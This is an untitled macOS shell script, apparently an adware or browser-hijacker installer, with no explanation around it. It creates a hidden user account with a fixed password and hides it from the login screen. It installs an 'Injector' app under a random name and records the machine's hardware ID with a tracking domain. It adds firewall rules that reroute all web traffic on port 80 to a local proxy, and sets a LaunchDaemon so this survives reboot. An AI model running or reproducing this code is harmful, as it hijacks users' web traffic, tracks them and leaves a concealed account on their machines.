Untitled

#!/bin/sh
updf="/var/tmp/updt.txt"

# get random names
n=$(cat /usr/share/dict/words | wc -l)

companyName=$(cat -n /usr/share/dict/words | grep -w $(jot -r 1 1 $n) | cut -f2)
echo $companyName

# create hidden user
HIDDEN_USER=$(cat -n /usr/share/dict/words | grep -w $(jot -r 1 1 $n) | cut -f2)
echo $HIDDEN_USER >> $updf
userName=$HIDDEN_USER

preferencesFileName="com."
preferencesFileName+=$companyName
preferencesFileName+=".plist"
echo $preferencesFileName >> $updf

netPreferencesFileName="com."
netPreferencesFileName+=$companyName
netPreferencesFileName+=".plist"
echo $netPreferencesFileName >> $updf

settingsFileName=$companyName
settingsFileName+=".sh"

configFileName=$companyName
configFileName+=".conf"

settingsFileData="#!/bin/sh\n\
\n\
if [ -a /Library/"$companyName"/Contents/MacOS/"$companyName" ];\n\
then\n\
sleep 10\n\
sudo pfctl -evf /etc/"$configFileName"\n\
sudo -u "$userName" /Library/"$companyName"/Contents/MacOS/"$companyName"\n\
fi\n\
exit 0\n"
echo "$settingsFileData" > /etc/$settingsFileName
sudo chown root /etc/$settingsFileName
sudo chmod 755 /etc/$settingsFileName

# copy files
sudo cp -r Injector.app $companyName
sudo cp -r $companyName /Library
sudo rm -r $companyName
sudo chmod -R 755 "/Library/"$companyName

#change name of the exe
sudo mv "/Library/"$companyName"/Contents/MacOS/Injector" "/Library/"$companyName"/Contents/MacOS/"$companyName

#configure hidden account
HIDDEN_PASS=test
HIDDEN_UID=401
HIDDEN_NAME="User "$HIDDEN_USER

HIDDEN_HOME="/var/$HIDDEN_USER"

sudo dscl . -create /Users/$HIDDEN_USER UniqueID $HIDDEN_UID
sudo dscl . -create /Users/$HIDDEN_USER PrimaryGroupID 20
sudo dscl . -create /Users/$HIDDEN_USER NFSHomeDirectory "$HIDDEN_HOME"
sudo dscl . -create /Users/$HIDDEN_USER UserShell /bin/bash
sudo dscl . -create /Users/$HIDDEN_USER RealName "$HIDDEN_NAME"
sudo dscl . -passwd /Users/$HIDDEN_USER $HIDDEN_PASS
sudo mkdir "$HIDDEN_HOME"
sudo chown -R $HIDDEN_USER "$HIDDEN_HOME"
sudo chmod a+rwx "/Library/"$companyName"/Contents/MacOS/"$companyName

# Enable the Hide500Users attribute
sudo defaults write /Library/Preferences/com.apple.loginwindow Hide500Users -bool YES

# read parameters
dist_channel_id=$1
machine_id=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }')
click_id=$2
domain=$3

if [ -z "$dist_channel_id" ];
then
    echo "Default for dist channel" >> $updf
    dist_channel_id="A1000"
fi

if [ -z "$click_id" ];
then
    echo "Default for click id" >> $updf
    click_id="0"
fi

if [ -z "$domain" ];
then
echo "Default for domain"
domain="http://aadcd15734d97346bb85f545dc8ca03e7e.com"
fi

# write parameters to preferences file
sudo defaults write "/Library/Preferences/"$preferencesFileName dist_channel_id "$dist_channel_id"
sudo defaults write "/Library/Preferences/"$preferencesFileName machine_id "$machine_id"
sudo defaults write "/Library/Preferences/"$preferencesFileName click_id "$click_id"
sudo defaults write "/Library/Preferences/"$preferencesFileName domain "$domain"
sudo plutil -convert xml1 "/Library/Preferences/"$preferencesFileName

# INSTALL SERVER
# set redirections
activeInterface=$(route get default | sed -n -e 's/^.*interface: //p')
if [ -n "$activeInterface" ]; then
    pfData="rdr pass inet proto tcp from $activeInterface to any port 80 -> 127.0.0.1 port 9882\n\
pass out on $activeInterface route-to lo0  inet proto tcp from $activeInterface to any port 80 keep state\n\
pass out proto tcp all user "$HIDDEN_USER"\n"
    echo "$pfData" > /etc/$configFileName

# run server
sudo cp com.pref.plist "/Library/LaunchDaemons/"$netPreferencesFileName
sudo defaults write "/Library/LaunchDaemons/"$netPreferencesFileName Label "$netPreferencesFileName"
sudo defaults write "/Library/LaunchDaemons/"$netPreferencesFileName ProgramArguments -array '/etc/'$settingsFileName''
sudo chmod 755 "/Library/LaunchDaemons/"$netPreferencesFileName
sudo launchctl load -w "/Library/LaunchDaemons/"$netPreferencesFileName

else
    echo "Unable to find active interface" >> $updf
    exit 1
fi

exit 0